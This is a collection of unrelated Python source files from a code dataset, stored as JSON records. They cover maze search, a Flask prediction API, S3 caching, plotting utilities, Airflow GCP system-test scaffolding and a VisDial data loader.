current_position = stack.pop()\n self.fullPath.append(current_position.id)\n i = current_position.id // self.columns_num\n j = current_position.id % self.columns_num\n\n if (current_position.value == 'E'):\n\n break\n\n if (current_position.right != None and node_list_maze[i][ j + 1].value != '#' and current_position.right not in self.fullPath):\n node_list_maze[i][j + 1].previousNode = current_position.id\n stack.append(node_list_maze[i][j + 1])\n\n if (current_position.left != None and node_list_maze[i][j - 1].value != '#' and current_position.left not in self.fullPath):\n node_list_maze[i][j - 1].previousNode = current_position.id\n stack.append(node_list_maze[i][j - 1])\n\n if (current_position.down != None and node_list_maze[i + 1][j].value != '#' and current_position.down not in self.fullPath):\n node_list_maze[i + 1][j].previousNode = current_position.id\n stack.append(node_list_maze[i + 1][j])\n\n if (current_position.up != None and node_list_maze[i - 1][ j].value != '#' and current_position.up not in self.fullPath):\n node_list_maze[i - 1][j].previousNode = current_position.id\n stack.append(node_list_maze[i - 1][j])\n\n\n # get path = direct path\n first = self.fullPath[0]\n self.path.append(first)\n\n for k in range(1, len(self.fullPath)):\n m = first // self.columns_num\n n = first % self.columns_num\n if (first < self.fullPath[k]):\n self.path.append(self.fullPath[k])\n first = self.fullPath[k]\n else:\n\n first_node = node_list_maze[m][n]\n\n if (self.fullPath[k]!=first_node.left and first_node.up != self.fullPath[k]):\n self.path.pop()\n previous_of_first = first_node.previousNode\n\n m1 = previous_of_first // self.columns_num\n n1 = previous_of_first % self.columns_num\n previous_node_of_first = node_list_maze[m1][n1]\n\n\n while first_node.previousNode > self.fullPath[k] and previous_node_of_first.left != self.fullPath[k] \\\n and previous_node_of_first.up != self.fullPath[k]:\n if (len(self.path) != 0):\n y = self.path.pop()\n m2 = y // self.columns_num\n n2 = y % self.columns_num\n first_node = node_list_maze[m2][n2]\n\n m1 = first_node.previousNode // self.columns_num\n n1 = first_node.previousNode % self.columns_num\n previous_node_of_first = node_list_maze[m1][n1]\n self.path.append(self.fullPath[k])\n first = self.fullPath[k]\n else:\n\n self.path.append(self.fullPath[k])\n first = self.fullPath[k]\n return self.fullPath, self.path\n\n\n# endregion\n\n#################################### Algorithms Main Functions #####################################\n# region Search_Algorithms_Main_Fn\ndef SearchAlgorithm_Main():\n searchAlgo = SearchAlgorithms('S,.,.,#,.,.,. .,#,.,.,.,#,. .,#,.,.,.,.,. .,.,#,#,.,.,. 
#,.,#,E,.,#,.')\n fullPath, path = searchAlgo.DFS()\n print('**DFS**\\n Full Path is: ' + str(fullPath) +'\\n Path is: ' + str(path))\n\n# endregion\n\n######################## MAIN ###########################33\nif __name__ == '__main__':\n\n SearchAlgorithm_Main()\n","sub_path":"MazeGame.py","file_name":"MazeGame.py","file_ext":"py","file_size_in_byte":7118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"422551726","text":"from flask import Flask, request\r\nimport numpy as np\r\nfrom flask import Flask,request\r\nimport pandas as pd\r\nimport numpy as np\r\nimport pickle\r\nimport flasgger\r\nfrom flasgger import Swagger\r\n\r\napp=Flask(__name__)\r\nSwagger(app)\r\n\r\npickle_in = open(\"lr.pkl\",\"rb\")\r\nclassifier=pickle.load(pickle_in)\r\n\r\n@app.route('/')\r\ndef welcome():\r\n return \"Welcome All\"\r\n\r\n@app.route('/predict',methods=[\"Get\"])\r\ndef predict_note_authentication():\r\n \r\n \"\"\"Let's Predict Bankruptcy \r\n ---\r\n parameters: \r\n - name: Net worth/Assets\r\n in: query\r\n type: number\r\n required: true\r\n - name: Persistent EPS in the Last Four Seasons\r\n in: query\r\n type: number\r\n required: true\r\n - name: Net profit before tax/Paid-in capital\r\n in: query\r\n type: number\r\n required: true\r\n - name: Borrowing dependency\r\n in: query\r\n type: number\r\n required: true\r\n - name: Net Income to Stockholder's Equity\r\n in: query\r\n type: number\r\n required: true\r\n responses:\r\n 200:\r\n description: The output values\r\n \r\n \"\"\"\r\n var1=float(request.args.get(\"Net worth/Assets\"))\r\n var2=float(request.args.get(\"Persistent EPS in the Last Four Seasons\"))\r\n var3=float(request.args.get(\"Net profit before tax/Paid-in capital\"))\r\n var4=float(request.args.get(\"Borrowing dependency\"))\r\n var5=float(request.args.get(\"Net Income to Stockholder's Equity\"))\r\n prediction=classifier.predict([[var1,var2,var3,var4,var5]])\r\n if prediction==1:\r\n return \"The company is going to be bankrupt!!\"\r\n return \"The company is safe. :)\"\r\n\r\n\r\nif __name__=='__main__':\r\n app.run(host='0.0.0.0')","sub_path":"flask_test2.py","file_name":"flask_test2.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"77255880","text":"# Copyright (c) 2018 The Regents of the University of Michigan\n# and the University of Pennsylvania\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\nFunctions for caching data for MORF jobs.\n\"\"\"\n\nimport os\nimport subprocess\nfrom urllib.parse import urlparse\nimport logging\n\nlogger = logging.getLogger()\n\ndef cache_s3_to_local(bucket, local_dest):\n \"\"\"\n Cache all data in an s3 bucket to local_dest, creating a complete copy of files and directory structure.\n :param bucket: path to s3 bucket.\n :param local_dest: local destination to cache to (string). If it does not exist, it will be created.\n :return:\n \"\"\"\n # check paths\n s3_url = urlparse(bucket)\n assert s3_url.scheme == \"s3\", \"specify a valid path to an s3 bucket\"\n # create local_dest directory if not exists\n if not os.path.exists(local_dest):\n try:\n os.makedirs(local_dest)\n except exception as e:\n logger.error(\"error creating cache: {}\".format(e))\n raise\n # execute s3 sync command\n cmd = \"aws s3 sync {} {}\".format(bucket, local_dest)\n logger.info(\"running {}\".format(cmd))\n subprocess.call(cmd, shell=True)\n return\n\n\ndef update_morf_job_cache(job_config):\n \"\"\"\n Update the raw data cache using the parameters in job_config; if job_config contains multiple raw data buckets, cache all of them.\n :param job_config: MorfJobConfig object.\n :return:\n \"\"\"\n job_cache_dir = job_config.cache_dir\n # cache each bucket in a named directory within job_cache_dir\n for raw_data_bucket in job_config.raw_data_buckets:\n s3bucket = \"s3://{}\".format(raw_data_bucket)\n bucket_cache_dir = os.path.join(job_cache_dir, raw_data_bucket)\n cache_s3_to_local(s3bucket, bucket_cache_dir)\n return","sub_path":"morf-python-api/build/lib/morf/utils/caching.py","file_name":"caching.py","file_ext":"py","file_size_in_byte":2789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"234959557","text":"import tensorflow as tf\nimport numpy as np\nfrom _collections import defaultdict\nimport matplotlib.pyplot as plt\nimport itertools\n\ndef _setupRandomSeed():\n SEED = [None]\n def setSeed(seed=None):\n seed = SEED[0] if seed is None else seed\n SEED[0] = seed\n \n np.random.seed(seed)\n return\n \n return setSeed\n\nsetupRandomSeed = _setupRandomSeed()\n\ndef setup(MAX_GPU_MEMORY, RANDOM_SEED):\n gpus = tf.config.experimental.list_physical_devices('GPU')\n tf.config.experimental.set_virtual_device_configuration(\n gpus[0], [tf.config.experimental.VirtualDeviceConfiguration(memory_limit=MAX_GPU_MEMORY)]\n )\n setupRandomSeed(RANDOM_SEED)\n\ndef saveMetrics(metrics, filepath, startEpoch=0):\n collectedData = defaultdict(dict)\n for dataName, values in metrics.items():\n name = dataName.replace('val_', '')\n metricKind = 'test' if dataName.startswith('val_') else 'train'\n collectedData[name][metricKind] = list(values)\n \n for name, data in collectedData.items():\n plt.clf()\n fig = plt.figure()\n axe = fig.subplots(ncols=1, nrows=1)\n for nm, values in data.items():\n axe.plot(values[startEpoch:], label=nm)\n \n axe.title.set_text(name)\n axe.set_ylabel(name)\n axe.set_xlabel('epoch')\n axe.legend(loc='upper left')\n fig.savefig(filepath('%s.png' % name))\n plt.close(fig)\n \n return\n\ndef plot_confusion_matrix(\n cm,\n target_names,\n saveTo,\n title='Confusion matrix',\n onlyErrors=False\n):\n plt.clf()\n accuracy = np.trace(cm) / 
float(np.sum(cm))\n misclass = 1 - accuracy\n # mask out diagonal\n if onlyErrors:\n for i in range(cm.shape[0]):\n cm[i, i] = 0\n\n plt.figure(figsize=(8, 6))\n plt.imshow(cm, interpolation='nearest', cmap=plt.get_cmap('Blues'))\n plt.title('%s (accuracy=%0.4f; misclass=%0.4f)' % (title, accuracy, misclass))\n plt.colorbar()\n\n if target_names is not None:\n tick_marks = np.arange(len(target_names))\n plt.xticks(tick_marks, target_names, rotation=45)\n plt.yticks(tick_marks, target_names)\n\n thresh = cm.max() / 2.0\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n text = str(cm[i, j])\n if onlyErrors:\n if (cm[i, j] <= 0.0) or (i == j):\n text = ''\n \n color = \"white\" if cm[i, j] > thresh else \"black\"\n plt.text(j, i, text, horizontalalignment=\"center\", color=color)\n continue\n \n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n plt.savefig(saveTo)\n plt.close()\n return\n","sub_path":"Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":2470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"286873407","text":"lineOne = input()\r\nlineTwo = input()\r\nlenOne, lenTwo = len(lineOne), len(lineTwo)\r\nlcs = {} #[lcs의 길이, lineTwo에서 lcs의 마지막 원소에 해당하는 index]\r\nfor i in range(lenOne):\r\n for j in range(lenTwo):\r\n if lineOne[i] == lineTwo[j]:\r\n if i == 0:\r\n lcs[0].append([1,j])\r\n break\r\n tmp = [1,j]\r\n lcs.append(tmp)\r\n for tup in lcs[::-1]:\r\n if tup[1] < j:\r\n lcs.append([tup[0]+1, j])\r\n","sub_path":"9251.py","file_name":"9251.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"612492635","text":"# Copyright (c) 2017 Iotic Labs Ltd. All rights reserved.\n\nfrom importlib import import_module\n\nimport logging\nlog = logging.getLogger(__name__)\n\n\ndef getItemFromModule(module, item=None):\n \"\"\"Loads an item from a module. E.g.: moduleName=a.b.c is equivalent to 'from a.b import c'. If additionally\n itemName = d, this is equivalent to 'from a.b.c import d'. Returns None on failure\"\"\"\n try:\n if item is None:\n item = module.rsplit('.', maxsplit=1)[-1]\n module = module[:-(len(item) + 1)]\n return getattr(import_module(module), item)\n except:\n log.exception('Failed to import %s.%s', module, item if item else '')\n\n\ndef loadConfigurableComponent(config, basename, includeBaseConfig=True, key='impl'):\n \"\"\"Loads the given component from configuration, as defined (via 'impl') in the given basename config section.\n On failure returns None. includeBaseConfig indicates whether to supply base config section to component in\n addition to implementation specific section. 
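    As an illustration (section and class names here are hypothetical), a config
    like {'store': {'impl': 'mypkg.DiskStore'}, 'mypkg.DiskStore': {'path': '/tmp'}}
    with basename='store' loads mypkg.DiskStore and hands it the 'mypkg.DiskStore'
    section, preceded by the 'store' section when includeBaseConfig is set.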
The implementing component should accept a configuration argument\n (or two, if includeBaseConfig is set).\"\"\"\n if not (basename in config and\n key in config[basename] and\n config[basename][key] in config):\n log.error('%s section, \"%s\" value or \"%s\" section missing', basename, key, key)\n return\n implName = config[basename][key]\n log.debug('Loading component %s (%s)', basename, implName)\n component = getItemFromModule(implName)\n if component is None:\n return\n try:\n if includeBaseConfig:\n return component(dict(config[basename]), dict(config[implName]))\n else:\n return component(dict(config[implName]))\n except:\n log.exception('Failed to initialise %s', implName)\n return\n","sub_path":"src/Ioticiser/import_helper.py","file_name":"import_helper.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"622558863","text":"import unittest\nfrom city_functions import city_country\n\n\nclass CityCountryTestCase(unittest.TestCase):\n '''To test the function of city_country'''\n\n def test_city_country(self):\n '''Testing function 1'''\n\n description = city_country('Beijing', 'China')\n self.assertEqual('Beijing, China', description)\n\n def test_city_country_population(self):\n '''Testing function 2'''\n\n description = city_country('Beijing', 'China', population=30000000)\n self.assertEqual('Beijing, China - population 30000000', description)\n\n\nunittest.main()","sub_path":"Python Practice/Python编程:从入门到实践/第11章/test_cities.py","file_name":"test_cities.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"67459426","text":"#!/usr/bin/env python3\nimport sys\nimport math\n\n\ndef solve(A: int, B: int, W: int):\n w = W * 1000\n\n max = 0\n min = 0\n\n c = w // B\n d = c * B\n # print(c, d)\n if d == w:\n min = c\n else:\n min = c + 1\n\n e = w // A\n f = e * A\n # print(e, f, w- f, (w-f)/e)\n if (w-f)/e > B- A:\n print(\"UNSATISFIABLE\")\n else:\n print(min, e)\n\n return\n\n\n# Generated by 1.1.7.1 https://github.com/kyuridenamida/atcoder-tools (tips: You use the default template now. You can remove this line by using your custom template)\ndef main():\n def iterate_tokens():\n for line in sys.stdin:\n for word in line.split():\n yield word\n tokens = iterate_tokens()\n A = int(next(tokens)) # type: int\n B = int(next(tokens)) # type: int\n W = int(next(tokens)) # type: int\n solve(A, B, W)\n\nif __name__ == '__main__':\n main()\n","sub_path":"abc/abc195/B/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"156530429","text":"\"\"\"\nAuthor: Matt Tarantino\nDescription: This application will prompt the user to enter 3 inputs\nand evaluate the inputs to return the max in a print statement.\n\"\"\"\n\n#Requests inputs from user. If an error occurs, a message\n#will be returned to the user and the script will exit.\ntry:\n input1 = input('Please enter the first value: ')\n input2 = input('Please enter the second value: ')\n input3 = input('Please enter the third value: ')\nexcept EOFError:\n print('EOF command given. Quitting...bye!')\n exit()\nexcept:\n print('This input is invalid! Please try again.')\n exit()\n\nif input1.isspace() or input2.isspace() or input3.isspace():\n print('One or more of your inputs contained only spaces. 
Please try again with valid inputs (letters, numbers, strings)!')\n exit()\n\n#Custom defined function that takes 3 parameters and compares them to return\n#the max of the 3 parameters.\ndef maxOfThree(first, second, third):\n max = first\n\n if second > first:\n max = second\n\n if third > max:\n max = third\n\n #Need to check second against third incase the first if statement did\n #not execute.\n if second > third:\n max = second\n\n return max\n\n#calls the function and saves the response to a variable called max\n#(used in print).\nmax = maxOfThree(input1, input2, input3)\n\nprint('The maximum of ' + input1 + ' ' + input2 + ' ' + input3 + ' is ' + max)\n","sub_path":"p3/p3-mtarantino.py","file_name":"p3-mtarantino.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"623004222","text":"# -*- coding: utf-8 -*-\n#\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\nimport os\nimport subprocess\nimport unittest\nfrom glob import glob\nfrom shutil import move\nfrom tempfile import mkdtemp\n\nfrom airflow.utils import db as db_utils\nfrom airflow import models, AirflowException, LoggingMixin\nfrom airflow.utils.timezone import datetime\nfrom tests.contrib.utils.gcp_authenticator import GcpAuthenticator\nfrom tests.contrib.utils.run_once_decorator import run_once\n\nAIRFLOW_MAIN_FOLDER = os.path.realpath(os.path.join(\n os.path.dirname(os.path.realpath(__file__)),\n os.pardir, os.pardir, os.pardir))\n\nAIRFLOW_PARENT_FOLDER = os.path.realpath(os.path.join(AIRFLOW_MAIN_FOLDER,\n os.pardir, os.pardir, os.pardir))\nENV_FILE_RETRIEVER = os.path.join(AIRFLOW_PARENT_FOLDER,\n \"get_system_test_environment_variables.py\")\n\n\n# Retrieve environment variables from parent directory retriever - it should be\n# in the path ${AIRFLOW_SOURCE_DIR}/../../get_system_test_environment_variables.py\n# and it should print all the variables in form of key=value to the stdout\nclass RetrieveVariables:\n @staticmethod\n @run_once\n def retrieve_variables():\n if os.path.isfile(ENV_FILE_RETRIEVER):\n if os.environ.get('AIRFLOW__CORE__UNIT_TEST_MODE'):\n raise Exception(\"Please unset the AIRFLOW__CORE__UNIT_TEST_MODE\")\n variables = subprocess.check_output([ENV_FILE_RETRIEVER]).decode(\"utf-8\")\n print(\"Applying variables retrieved\")\n for line in variables.split(\"\\n\"):\n try:\n variable, key = line.split(\"=\")\n except ValueError:\n continue\n print(\"{}={}\".format(variable, key))\n os.environ[variable] = key\n\n\nRetrieveVariables.retrieve_variables()\n\nDEFAULT_DATE = datetime(2015, 1, 1)\n\nCONTRIB_OPERATORS_EXAMPLES_DAG_FOLDER = os.path.join(\n AIRFLOW_MAIN_FOLDER, \"airflow\", \"contrib\", \"example_dags\")\n\nOPERATORS_EXAMPLES_DAG_FOLDER = os.path.join(\n 
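    # note added for clarity: this resolves airflow/example_dags in the source
    # tree; like the contrib folder above, it is a source from which tests
    # symlink DAG files into DAG_FOLDER defined below.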
AIRFLOW_MAIN_FOLDER, \"airflow\", \"example_dags\")\n\nAIRFLOW_HOME = os.environ.get('AIRFLOW_HOME',\n os.path.join(os.path.expanduser('~'), 'airflow'))\n\nDAG_FOLDER = os.path.join(AIRFLOW_HOME, \"dags\")\n\n\nSKIP_TEST_WARNING = \"\"\"\nThe test is only run when the test is run in with GCP-system-tests enabled\nenvironment. You can enable it in one of two ways:\n\n* Set GCP_CONFIG_DIR environment variable to point to the GCP configuration\n directory which keeps variables.env file with environment variables to set\n and keys directory which keeps service account keys in .json format\n* Run this test within automated environment variable workspace where\n config directory is checked out next to the airflow one.\n\n\"\"\".format(__file__)\n\n\nclass BaseGcpSystemTestCase(unittest.TestCase, LoggingMixin):\n def __init__(self,\n method_name,\n gcp_key,\n project_extra=None):\n super().__init__(methodName=method_name)\n self.gcp_authenticator = GcpAuthenticator(gcp_key=gcp_key,\n project_extra=project_extra)\n self.setup_called = False\n\n @staticmethod\n def skip_check(key_name):\n return GcpAuthenticator(key_name).full_key_path is None\n\n def setUp(self):\n self.gcp_authenticator.gcp_store_authentication()\n self.gcp_authenticator.gcp_authenticate()\n # We checked that authentication works. Ne we revoke it to make\n # sure we are not relying on the default authentication\n self.gcp_authenticator.gcp_revoke_authentication()\n self.setup_called = True\n\n # noinspection PyPep8Naming\n def tearDown(self):\n self.gcp_authenticator.gcp_restore_authentication()\n\n\nclass DagGcpSystemTestCase(BaseGcpSystemTestCase):\n def __init__(self,\n method_name,\n gcp_key,\n dag_id=None,\n dag_name=None,\n require_local_executor=False,\n example_dags_folder=CONTRIB_OPERATORS_EXAMPLES_DAG_FOLDER,\n project_extra=None):\n super().__init__(method_name=method_name,\n gcp_key=gcp_key,\n project_extra=project_extra)\n self.dag_id = dag_id\n self.dag_name = self.dag_id + '.py' if not dag_name else dag_name\n self.example_dags_folder = example_dags_folder\n self.require_local_executor = require_local_executor\n self.temp_dir = None\n\n @staticmethod\n def _get_dag_folder():\n return DAG_FOLDER\n\n @staticmethod\n def _get_files_to_link(path):\n \"\"\"\n Returns all file names (note - file names not paths)\n that have the same base name as the .py dag file (for example dag_name.sql etc.)\n :param path: path to the dag file.\n :return: list of files matching the base name\n \"\"\"\n prefix, ext = os.path.splitext(path)\n assert ext == '.py', \"Dag name should be a .py file and is {} file\".format(ext)\n files_to_link = []\n for file in glob(prefix + \".*\"):\n files_to_link.append(os.path.basename(file))\n return files_to_link\n\n def _symlink_dag_and_associated_files(self, remove=False):\n target_folder = self._get_dag_folder()\n source_path = os.path.join(self.example_dags_folder, self.dag_name)\n for file_name in self._get_files_to_link(source_path):\n source_path = os.path.join(self.example_dags_folder, file_name)\n target_path = os.path.join(target_folder, file_name)\n if remove:\n try:\n self.log.info(\"Remove symlink: %s -> %s\", target_path, source_path)\n os.remove(target_path)\n except OSError:\n pass\n else:\n if not os.path.exists(target_path):\n self.log.info(\"Symlink: %s -> %s \", target_path, source_path)\n os.symlink(source_path, target_path)\n else:\n self.log.info(\"Symlink %s already exists. 
Not symlinking it.\", target_path)\n\n def _store_dags_to_temporary_directory(self):\n dag_folder = self._get_dag_folder()\n self.temp_dir = mkdtemp()\n self.log.info(\"Storing DAGS from %s to temporary directory %s\", dag_folder, self.temp_dir)\n try:\n os.mkdir(dag_folder)\n except OSError:\n pass\n for file in os.listdir(dag_folder):\n move(os.path.join(dag_folder, file), os.path.join(self.temp_dir, file))\n\n def _restore_dags_from_temporary_directory(self):\n dag_folder = self._get_dag_folder()\n self.log.info(\"Restoring DAGS to %s from temporary directory %s\", dag_folder, self.temp_dir)\n for file in os.listdir(self.temp_dir):\n move(os.path.join(self.temp_dir, file), os.path.join(dag_folder, file))\n\n def _run_dag(self, dag_id=None):\n self.log.info(\"Attempting to run DAG: %s\", self.dag_id)\n if not self.setup_called:\n raise AirflowException(\"Please make sure to call super.setUp() in your \"\n \"test class!\")\n dag_folder = self._get_dag_folder()\n dag_bag = models.DagBag(dag_folder=dag_folder, include_examples=False)\n self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}\n dag = dag_bag.get_dag(self.dag_id or dag_id)\n if dag is None:\n raise AirflowException(\n \"The Dag {} could not be found. It's either an import problem or \"\n \"the dag {} was not symlinked to the DAGs folder. \"\n \"The content of the {} folder is {}\".\n format(self.dag_id,\n self.dag_id + \".py\",\n dag_folder,\n os.listdir(dag_folder)))\n dag.clear(reset_dag_runs=True)\n dag.run(ignore_first_depends_on_past=True, verbose=True)\n\n @staticmethod\n def _check_local_executor_setup():\n postgres_path = os.path.realpath(os.path.join(\n AIRFLOW_MAIN_FOLDER,\n \"tests\", \"contrib\", \"operators\", \"postgres_local_executor.cfg\"))\n if postgres_path != os.environ.get('AIRFLOW_CONFIG'):\n raise AirflowException(\n \"\"\"\nPlease set AIRFLOW_CONFIG variable to '{}'\nand make sure you have a Postgres server running locally and\nairflow/airflow.db database created.\n\nYou can create the database via these commands:\n'createuser root'\n'createdb airflow/airflow.db`\n\n\"\"\".format(postgres_path))\n\n # noinspection PyPep8Naming\n def setUp(self):\n if self.require_local_executor:\n self._check_local_executor_setup()\n try:\n # We want to avoid random errors while database got reset - those\n # Are apparently triggered by parser trying to parse DAGs while\n # The tables are dropped. 
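            # (comment added) the finally clause below restores the saved DAGs
            # even if upgradedb()/resetdb() raise, so the dags folder is never
            # left empty after a failed reset.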
We move the dags temporarily out of the dags folder\n # and move them back after reset\n self._store_dags_to_temporary_directory()\n try:\n db_utils.upgradedb()\n db_utils.resetdb()\n finally:\n self._restore_dags_from_temporary_directory()\n self._symlink_dag_and_associated_files()\n super().setUp()\n\n except Exception as e:\n # In case of any error during setup - restore the authentication\n self.gcp_authenticator.gcp_restore_authentication()\n raise e\n\n def tearDown(self):\n self._symlink_dag_and_associated_files(remove=True)\n super().tearDown()\n","sub_path":"tests/contrib/utils/base_gcp_system_test_case.py","file_name":"base_gcp_system_test_case.py","file_ext":"py","file_size_in_byte":10440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"442929566","text":"class Statistic():\n\n def __init__(self, courseID, an, promovability):\n self.courseID = courseID\n self.an = an\n self.promovability = promovability\n\n def toJson(self):\n\n jsonString = b'{'\n jsonString += b'\"courseID\":\"' + str(self.courseID).encode('ascii') + b'\",'\n jsonString += b'\"an\":\"' + str(self.an).encode('ascii') + b'\",'\n jsonString += b'\"promovability\":\"' + str(self.promovability).encode('ascii') + b'\"}'\n\n return jsonString\n\n def toSqlString(self):\n sqlString = \"'\"\n sqlString += str(self.courseID)+ \"','\"\n sqlString += str(self.an)+ \"','\"\n sqlString += str(self.promovability)+ \"'\"\n\n return sqlString","sub_path":"server/statistics/statistic.py","file_name":"statistic.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"160156005","text":"import json\nimport numpy as np\nimport random\nimport torch\nimport torch.nn.functional as F\nimport QBot\nimport json\nimport h5py\n\n\nclass DataLoader:\n\tdef __init__(self, dialog_loc, image_loc, param_loc):\n\t\tself.dialog_loc = dialog_loc\n\t\tself.image_loc = image_loc\n\t\tself.param_loc = param_loc\n\t\tself.dialog = h5py.File(dialog_loc, 'r')\n\t\tself.imageAll = h5py.File(image_loc, 'r')\n\t\twith open(param_loc, 'rb') as input_json:\n\t\t\tself.params = json.loads(input_json.read().decode('utf-8'))\n\t\tself.processData()\n\n\tdef getCNNOutputs(self):\n\t\tall_images = {'train' : {}, 'val' : {}}\n\t\tcnn_features = []\n\t\twith open('../visdial_params.json', 'rb') as input_json:\n\t\t\tself.cnnParams = json.loads(input_json.read().decode('utf-8'))\n\t\tfor dataset in ['train','val']:\n\t\t\tfor index, img in enumerate(self.cnnParams['img_'+dataset]):\n\t\t\t\tall_images[dataset][int(img['imgId'])] = index\n\t\tself.cnnFeatures = h5py.File('../vdl_img_vgg.h5', 'r')\n\t\toutput = h5py.File('../vgg_cnn_features.h5', 'w')\n\t\tfor dataset in ['test', 'val', 'train']:\n\t\t\tfeatures = np.zeros((len(self.params['unique_img_'+dataset]), self.cnnFeatures['images_train'].shape[1], self.cnnFeatures['images_train'].shape[2], self.cnnFeatures['images_train'].shape[3]))\n\t\t\tprint (features.shape)\n\t\t\tif dataset == 'test':\n\t\t\t\tprint (self.cnnFeatures['images_val'].shape)\n\t\t\telse:\n\t\t\t\tprint (self.cnnFeatures['images_train'].shape)\n\t\t\tprint ()\n\t\t\tfor index, img_id in enumerate(self.params['unique_img_'+dataset]):\n\t\t\t\tif dataset == 'test':\n\t\t\t\t\tfeatures[index] = np.array(self.cnnFeatures['images_val'][all_images['val'][int(img_id)]])\n\t\t\t\telse:\n\t\t\t\t\tfeatures[index] = 
np.array(self.cnnFeatures['images_train'][all_images['train'][int(img_id)]])\n\t\t\toutput.create_dataset('img_'+dataset, data=features)\n\t\toutput.close()\n\n\n\tdef processParams(self):\n\t\tself.unique_img_train = self.params['unique_img_train']\n\t\tself.unique_img_test = self.params['unique_img_test']\n\t\tself.unique_img_val = self.params['unique_img_val']\n\t\tself.ind2word = self.params['ind2word']\n\t\tself.ind2word = {int(key): value for key,value in self.ind2word.items()}\n\t\tself.word2ind = self.params['word2ind']\n\n\t\t#Add tokens\n\t\tself.START_TOKEN = ''\n\t\tself.END_TOKEN = ''\n\t\tself.PAD_TOKEN = ''\n\t\tself.START_INDEX = len(self.ind2word.keys()) + 1\n\t\tself.END_INDEX = len(self.ind2word.keys()) + 2\n\t\tself.PAD_INDEX = 0\n\n\t\tself.ind2word[self.PAD_INDEX] = self.PAD_TOKEN\n\t\tself.ind2word[self.START_INDEX] = self.START_TOKEN\n\t\tself.ind2word[self.END_INDEX] = self.END_TOKEN\n\n\t\tself.word2ind[self.PAD_TOKEN] = self.PAD_INDEX\n\t\tself.word2ind[self.START_TOKEN] = self.START_INDEX\n\t\tself.word2ind[self.END_TOKEN] = self.END_INDEX\n\n\tdef processQA(self):\n\t\tself.questions = {}\n\t\tself.questions_length = {}\n\t\tself.questions_count = {}\n\n\t\tself.answers = {}\n\t\tself.answers_length = {}\n\t\tself.answers_indexes = {}\n\n\t\tself.captions = {}\n\t\tself.captions_length = {}\n\n\t\tself.options = {}\n\t\tself.options_length = {}\n\t\tself.options_list = {}\n\t\tself.options_probs = {}\n\n\t\tfor dataset in ['train','val','test']:\n\t\t\tself.questions[dataset] = np.array(self.dialog['ques_'+dataset])\n\t\t\tself.questions_length[dataset] = np.array(self.dialog['ques_length_'+dataset])\n\t\t\tself.questions_count[dataset] = np.array(self.dialog['ques_count_'+dataset])\n\n\t\tfor dataset in ['train','val','test']:\n\t\t\tself.answers[dataset] = np.array(self.dialog['ans_'+dataset])\n\t\t\tself.answers_length[dataset] = np.array(self.dialog['ans_length_'+dataset])\n\t\t\tself.answers_indexes[dataset] = np.array(self.dialog['ans_index_'+dataset]) - 1\n\n\t\tfor dataset in ['train','val','test']:\n\t\t\tself.captions[dataset] = np.array(self.dialog['cap_'+dataset])\n\t\t\tself.captions_length[dataset] = np.array(self.dialog['cap_length_'+dataset])\n\n\t\tfor dataset in ['val','test']:\n\t\t\tself.options[dataset] = np.array(self.dialog['opt_'+dataset]) - 1\n\t\t\tself.options_length[dataset] = np.array(self.dialog['opt_length_'+dataset])\n\t\t\tself.options_list[dataset] = np.array(self.dialog['opt_list_'+dataset])\n\t\t\t# self.options_probs[dataset] = np.array(self.dialog['opt_len_'+dataset])\n\n\tdef processImage(self, normalize):\n\t\tself.images = {}\n\t\tself.image_pos = 